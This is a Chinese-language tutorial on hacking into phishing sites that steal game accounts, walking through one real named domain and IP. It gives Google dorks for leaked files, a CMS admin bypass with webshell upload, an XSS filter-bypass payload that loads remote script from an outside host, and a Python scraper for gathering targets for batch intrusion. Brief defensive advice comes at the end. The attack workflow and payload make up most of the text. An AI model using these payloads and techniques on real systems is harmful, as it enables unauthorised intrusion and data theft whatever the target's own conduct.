攻破黑市之拿下吃鸡DNF等游戏钓鱼站群
字数 1349 2025-08-18 11:37:19
钓鱼网站渗透实战教学文档
一、信息搜集阶段
1. 初始发现
- 钓鱼网站示例:http://mfnyongshihuigui.jiebao8.top
- 主域名:jiebao8.top
2. Google语法信息搜集
使用以下Google语法搜索潜在漏洞:
-
目录遍历漏洞
site:jiebao8.top intitle:index.of -
配置文件泄露
site:jiebao8.top ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini -
数据库文件泄露
site:jiebao8.top ext:sql | ext:dbf | ext:mdb -
日志文件泄露
site:jiebao8.top ext:log -
备份和历史文件
site:jiebao8.top ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup -
SQL错误
site:jiebao8.top intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()" -
公开文件信息
site:jiebao8.top ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv -
phpinfo()
site:jiebao8.top ext:php intitle:phpinfo "published by the PHP Group"
3. 威胁情报分析
使用微步在线分析域名:
https://x.threatbook.cn/domain/mfnyongshihuigui.jiebao8.top
发现:
- IP地址:162.247.96.114
- 该IP下共有230个域名(异常数量,可能用于恶意目的)
4. 端口扫描
发现开放端口:
- 21 (FTP)
- 80 (HTTP)
- 102 (SSH)
- 3306 (MySQL)
5. CMS识别
使用云悉CMS识别工具:
http://www.yunsee.cn/
识别结果为PCWAP CMS(小众CMS系统)
二、渗透阶段
1. 利用已知0day漏洞
- 已知PCWAP CMS存在0day漏洞
- 越权进入后台
2. 文件上传漏洞利用
- 修改文件上传类型,添加.php扩展名
- 上传图片LOGO时,由于修改了上传类型,可直接上传webshell
- 尝试上传:
- 大马
- 小马
- 一句话木马
3. 提权尝试
- 尝试执行Linux命令失败(可能被禁止)
- 打包所有源码进行后续分析
三、XSS漏洞挖掘与利用
1. 初始XSS测试
- 提交账号密码时抓包
- 测试payload:
u=12312312&p=12312"><c>1&bianhao=1- c标签成功执行,证明存在XSS漏洞
2. 过滤机制分析
通过模糊测试发现过滤机制:
- 过滤字符:a字符、onmouseover、onload等常见事件
- 最大输入长度:32个字符
- 过滤特殊字符:+, &#等
- 允许的事件:onscroll, onfocus
- 允许的标签:body, input, br, i
- Unicode编码未被过滤
3. 拆分跨站技术
由于限制严格,采用拆分跨站技术:
攻击原理:
- 构造一个函数,当鼠标滚轮移动时让所有元素获取焦点
- 使用input标签启动onfocus函数
- 分别加载XSS站点
攻击代码:
<body onscroll=$(`*`).focus()> 1
<i id="i">$.getScript(`//xs.tv`) 2
<input/onfocus=s=$("i").text()> 3
<input/onfocus=ev\u0061l(s)> 4
<br><br><br><br><br><br><br><br> 5
代码解释:
- 当移动鼠标滑轮时触发
$(*).focus(),使所有元素获得焦点 - i标签中包含要执行的JS代码(使用jQuery的getScript方法)
- 第一个input获取焦点时,获取i标签中的内容
- 第二个input获取焦点时,执行获取的JS代码
- 多个br标签确保页面足够长,便于触发滚动事件
四、批量攻击钓鱼网站
1. 钓鱼网站识别
通过关键词搜索识别钓鱼网站:
- "幸运冒险家启航-心悦俱乐部官方网站-腾讯游戏"
- "老兵空降回归-绝地求生官方网站-腾讯游戏"
2. 批量采集脚本
import requests
from bs4 import BeautifulSoup
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Connection': 'keep-alive',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'X-Forwarded-For':'120.239.169.74'
}
proxies = {
"http":"http://127.0.0.1:8080",
"https":"https://127.0.0.1:8080",
}
for i in range(0,200,10):
bd_search = "https://www.baidu.com/s?wd=幸运冒险家启航-心悦俱乐部官方网站-腾讯游戏&pn=%s" % str(i)
r = requests.get(bd_search, headers=headers, verify=False, proxies=proxies, timeout=2)
with open("1.html", "a+", encoding="utf-8") as f:
f.write(r.text)
soup = BeautifulSoup(r.text, "lxml")
url_list = soup.select(".t > a")
for url in url_list:
real_url = url['href']
try:
r = requests.get(real_url, headers=headers, verify=False, proxies=proxies, timeout=2)
print(r.url)
with open("exp.txt", "a+", encoding="utf-8") as f:
f.write(r.url+"\n")
except Exception as e:
print(e)
3. 批量渗透
- 编写专用脚本批量渗透钓鱼网站
- 发现部分钓鱼网站每天可获取上百个账号密码
五、防御建议
1. 对网站管理员
- 及时更新CMS系统,修补已知漏洞
- 严格限制文件上传类型
- 实施输入过滤和输出编码
- 限制单个IP的域名数量
- 监控异常登录行为
2. 对普通用户
- 警惕非官方域名的"官方网站"
- 不要在不同网站使用相同密码
- 开启二次验证
- 定期检查账号异常活动
六、总结
本案例展示了从信息搜集到实际渗透钓鱼网站的完整过程,重点介绍了在严格过滤条件下的XSS绕过技术。通过批量识别和渗透钓鱼网站,可以有效减少网络诈骗的发生。